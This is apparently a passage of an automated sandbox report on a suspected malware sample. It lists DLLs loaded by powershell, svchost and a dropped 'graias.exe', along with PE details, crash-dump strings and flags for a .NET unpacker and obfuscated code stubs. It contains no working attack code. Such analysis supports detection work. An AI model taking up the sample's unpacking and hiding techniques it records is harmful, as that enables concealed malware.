                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: winmm.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: urlmon.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: wininet.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: iertutil.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: srvcli.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: netutils.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: mswsock.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: winhttp.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: winnsi.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textshaping.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textinputframework.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coreuicomponents.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.shell.servicehostbuilder.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.staterepositoryps.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edputil.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mlang.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wkscli.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textshaping.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textinputframework.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coreuicomponents.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.shell.servicehostbuilder.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.staterepositoryps.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edputil.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mlang.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textshaping.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textinputframework.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coreuicomponents.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.shell.servicehostbuilder.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.staterepositoryps.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edputil.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mlang.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textshaping.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textinputframework.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coreuicomponents.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.shell.servicehostbuilder.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.staterepositoryps.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edputil.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mlang.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textshaping.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textinputframework.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coreuicomponents.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.shell.servicehostbuilder.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.staterepositoryps.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edputil.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mlang.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textshaping.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textinputframework.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coreuicomponents.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.shell.servicehostbuilder.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.staterepositoryps.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edputil.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mlang.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textshaping.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textinputframework.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coreuicomponents.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.shell.servicehostbuilder.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.staterepositoryps.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edputil.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: 4XYAW8PbZH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: 4XYAW8PbZH.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: System.Xml.ni.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: Accessibility.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.ni.pdbRSDS source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Configuration.ni.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: mscorlib.ni.pdbRSDS source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Configuration.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Xml.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Xml.ni.pdbRSDS# source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Core.ni.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: Microsoft.VisualBasic.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Windows.Forms.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Windows.Forms.pdbxX source: WERD47C.tmp.dmp.7.dr
                Source: Binary string: Microsoft.VisualBasic.pdbX source: WERD47C.tmp.dmp.7.dr
                Source: Binary string: mscorlib.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Drawing.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: mscorlib.ni.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Windows.Forms.pdbAccessibility.dllD source: WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Core.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.pdb4 source: WERE219.tmp.dmp.14.dr
                Source: Binary string: Accessibility.pdbMZ source: WERD47C.tmp.dmp.7.dr
                Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Drawing.pdbl source: WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Configuration.pdbP source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.ni.pdb source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr
                Source: Binary string: System.Core.ni.pdbRSDS source: WERD47C.tmp.dmp.7.dr, WERE219.tmp.dmp.14.dr

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, JcP3CXbCj2MePxFw4t.cs.Net Code: Wpate7UGii System.Reflection.Assembly.Load(byte[])
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, JcP3CXbCj2MePxFw4t.cs.Net Code: Wpate7UGii System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,3_2_0041BCF3
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 0_2_054D42D7 push ebx; ret 0_2_054D42DA
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_00434006 push ecx; ret 3_2_00434019
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_004567F0 push eax; ret 3_2_0045680E
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_0045B9DD push esi; ret 3_2_0045B9E6
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_00455EBF push ecx; ret 3_2_00455ED2
